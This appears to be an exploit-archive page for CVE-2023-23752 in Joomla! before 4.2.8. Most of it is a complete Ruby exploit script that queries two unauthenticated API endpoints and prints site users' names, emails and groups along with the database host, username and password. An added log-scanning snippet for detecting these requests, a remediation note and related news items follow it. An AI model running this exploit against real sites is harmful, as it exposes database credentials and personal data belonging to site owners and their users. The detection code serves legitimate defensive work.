Headline
Joomla! 4.2.7 Unauthenticated Information Disclosure
Joomla! versions prior to 4.2.8 suffer from an unauthenticated information disclosure vulnerability.
```ruby
#!/usr/bin/env ruby

# Exploit
## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure
## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)
## Author website: https://pwn.by/noraj/
## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752
## Date: 2023-03-24
## Vendor Homepage: https://www.joomla.org/
## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz
## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)
## Tested on: Joomla! Version 4.2.7
## CVE : CVE-2023-23752

# Vulnerability
## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab
## Date: 2023-02-24
## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/
## Title: Joomla Unauthorized Access
## CVE: CVE-2023-23752
## Patch: Update to >= 4.2.8
## References:
## - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/
## - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
## - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752
## - https://nvd.nist.gov/vuln/detail/CVE-2023-23752
## - https://vulncheck.com/blog/joomla-for-rce
## - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml

# standard library
require 'json'
# gems
require 'httpx'
require 'docopt'
require 'paint'

doc = <<~DOCOPT
  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}

  #{Paint['Usage:', :red]}
    #{__FILE__} <url> [options]
    #{__FILE__} -h | --help

  #{Paint['Parameters:', :red]}
    <url>       Root URL (base path) including HTTP scheme, port and root folder

  #{Paint['Options:', :red]}
    --debug     Display arguments
    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)
    -h, --help  Show this screen

  #{Paint['Examples:', :red]}
    #{__FILE__} http://127.0.0.1:4242
    #{__FILE__} https://example.org/subdir

  #{Paint['Project:', :red]}
    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)
    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)
    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)
DOCOPT

def fetch_users(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"
  http.get(vuln_url)
end

def parse_users(root_url, http)
  data_json = fetch_users(root_url, http)
  data = JSON.parse(data_json)['data']
  users = []
  data.each do |user|
    if user['type'] == 'users'
      id = user['attributes']['id']
      name = user['attributes']['name']
      username = user['attributes']['username']
      email = user['attributes']['email']
      groups = user['attributes']['group_names']
      users << {id: id, name: name, username: username, email: email, groups: groups}
    end
  end
  users
end

def display_users(root_url, http)
  users = parse_users(root_url, http)
  puts Paint['Users', :red, :bold]
  users.each do |u|
    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"
  end
end

def fetch_config(root_url, http)
  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"
  http.get(vuln_url)
end

def parse_config(root_url, http)
  data_json = fetch_config(root_url, http)
  data = JSON.parse(data_json)['data']
  config = {}
  data.each do |entry|
    if entry['type'] == 'application'
      key = entry['attributes'].keys.first
      config[key] = entry['attributes'][key]
    end
  end
  config
end

def display_config(root_url, http)
  c = parse_config(root_url, http)
  puts Paint['Site info', :red, :bold]
  puts "Site name: #{c['sitename']}"
  puts "Editor: #{c['editor']}"
  puts "Captcha: #{c['captcha']}"
  puts "Access: #{c['access']}"
  puts "Debug status: #{c['debug']}"
  puts
  puts Paint['Database info', :red, :bold]
  puts "DB type: #{c['dbtype']}"
  puts "DB host: #{c['host']}"
  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"
  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"
  puts "DB name: #{c['db']}"
  puts "DB prefix: #{c['dbprefix']}"
  puts "DB encryption #{c['dbencryption']}"
end

begin
  args = Docopt.docopt(doc)
  Paint.mode = 0 if args['--no-color']
  puts args if args['--debug']

  http = HTTPX
  display_users(args['<url>'], http)
  puts
  display_config(args['<url>'], http)
rescue Docopt::Exit => e
  puts e.message
end
```
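A defender-side check for the two requests the script above sends, added here as an example and not part of the original exploit or advisory: it scans web-server access logs for requests under `/api/index.php/v1/` that carry a `public` query parameter, and separates responses that were served (200) from those that were rejected. The combined log format, the sample lines and the names `scan` and `public_param?` are assumptions constructed for illustration.

```ruby
require 'uri'

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = <<~LOG
  203.0.113.7 - - [24/Mar/2023:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1987 "-" "example-client/1.0"
  203.0.113.7 - - [24/Mar/2023:10:01:03 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 642 "-" "example-client/1.0"
  198.51.100.9 - - [24/Mar/2023:10:05:41 +0000] "GET /subdir/api/index.php/v1/users?page=1&public=true HTTP/1.1" 401 85 "-" "example-client/1.0"
  192.0.2.15 - - [24/Mar/2023:10:06:00 +0000] "GET /index.php?option=com_content&public=true HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
  192.0.2.15 - - [24/Mar/2023:10:06:10 +0000] "GET /api/index.php/v1/content/articles HTTP/1.1" 401 85 "-" "Mozilla/5.0"
LOG

# Combined log format: client, timestamp, request line, status code.
LINE_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3}) /
# Prefix shared by the two endpoints the page's script requests; unanchored so
# that installs in a subfolder (e.g. /subdir) are matched as well.
API_RE = %r{/api/index\.php/v1/}

# True when the query string carries a `public` parameter. The query is
# form-decoded first so the parameter name is compared in its decoded form.
# Matching on the name alone (any value) is a deliberately broad assumption.
def public_param?(query)
  URI.decode_www_form(query.to_s).any? { |key, _| key == 'public' }
rescue ArgumentError # malformed percent-encoding in the query string
  false
end

# Returns one hash per suspicious request. A 200 means the endpoint answered
# and the returned data should be treated as exposed; any other status is
# recorded as a probe that the server rejected.
def scan(log)
  log.each_line.filter_map do |line|
    m = LINE_RE.match(line) or next
    path, query = m[:target].split('?', 2)
    next unless path.match?(API_RE) && public_param?(query)
    { ip: m[:ip], time: m[:time], path: path, status: m[:status].to_i,
      verdict: m[:status] == '200' ? :disclosed : :probe }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each do |h|
    puts "#{h[:verdict]} #{h[:ip]} [#{h[:time]}] #{h[:status]} #{h[:path]}"
  end
end
```

A `disclosed` hit on `config/application` means the database credentials in that response should be rotated, in addition to updating to 4.2.8 or later.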
Related news
A vulnerability in the popular Joomla! CMS has been added to CISA's known exploited vulnerabilities catalog.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added six security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This includes CVE-2023-27524 (CVSS score: 8.9), a high-severity vulnerability impacting the Apache Superset open-source data visualization software that could enable remote code execution.
By Waqas. Yet another day, yet another threat actor posing a danger to the cybersecurity of companies globally. This is a post from HackRead.com. Read the original post: New Hacker Group GambleForce Hacks Targets with Open Source Tools
A previously unknown hacker outfit called GambleForce has been attributed to a series of SQL injection attacks against companies primarily in the Asia-Pacific (APAC) region since at least September 2023. "GambleForce uses a set of basic yet very effective techniques, including SQL injections and the exploitation of vulnerable website content management systems (CMS) to steal sensitive
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.